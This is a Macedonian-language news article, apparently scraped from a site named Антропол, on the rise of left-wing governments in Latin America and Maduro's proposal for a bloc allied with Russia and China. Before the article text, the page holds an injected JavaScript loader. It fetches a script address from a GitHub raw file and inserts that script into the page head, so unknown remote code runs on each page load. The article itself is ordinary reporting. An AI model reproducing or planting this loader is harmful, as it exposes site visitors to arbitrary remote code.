;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Латинска Америка врти на лево - Антропол
АктуелноИнтернационално

Латинска Америка врти на лево

Во 2022 година 12 земји од Латинска Америка беа управувани од левичарски партии, додека само 7 се управувани од десничарски партии. После изборите во текот на 2022 во Колумбија и Бразил, и победата на левичарите, слободно може да се каже дека левицата го промени ликот на континентот.

Сè започна во 2018 година со победата на Андрес Мануел Лопез Обрадор на претседателските избори во Мексико, а продолжи следната година, кога Алберто Фернандез беше избран за претседател на Аргентина. Луис „Лучо“ Арце беше избран за претседател на Боливија во 2020 година . Минатата година Перу (Педро Кастиљо) и Чиле (Габриел Бориќ) добија левичарски претседатели. Но, најважната промена се случи во Колумбија, која за прв пат во историјата доби левичарски претседател – поранешниот герилец Густаво Петро беше избран за претседател во 2022 година, и покрај тоа што ја започна изборната трка како аутсајдер, а трендот продолжи во Хондурас, кој , покрај тоа што доби левичарска влада, ја доби и првата жена на претседателската функција – Ксиомара Кастро.

Круна на трендот беше реизборот на Луис Игнасио Лула да Силва за претседател на Бразил. Многумина го споредуваат овој тренд со почетокот на милениумот, кога на власт во нивните земји дојдоа Хуго Чавез – Венецуела, Ево Моралес -Боливија , и Нестор Кирхнер – Аргентина.

Николас Мадуро оди чекор подалеку, размислува за создавање нов регионален блок, сојузник на Русија и Кина

Венецуелскиот претседател Николас Мадуро предложи формирање нов меѓународен блок во кој ќе бидат вклучени земји од Латинска Америка и Карибите кои би имале блиски врски со Русија и Кина.

За време на неговиот годишен говор во парламентот на Венецуела во петокот, Мадуро рече дека неодамна разговарал со претседателите на Бразил, Колумбија и Аргентина за формирање нова регионална организација. Според Мадуро, „дојде време да се обединат напорите во формирањето на моќен политички и економска блок  во Латинска Америка.“

Венецуелскиот претседател рече дека блокот ќе создаде „нови полови на моќ“ и ќе биде сојузник на Русија и Кина, чии лидери Мадуро ги нарекува „постари браќа“.

Мадуро под голем притисок од САД

Во 2018 година тогашниот претседател Доналд Трамп, ги осуди изборите во Венецуела, на кои Мадуро победи за да обезбеди втор мандат, како „нелегитимни“. Вашингтон започна кампања за „максимален притисок“ за негово соборување со воведување остри санкции кон Каракас, кои вклучуваа ембарго за нафта.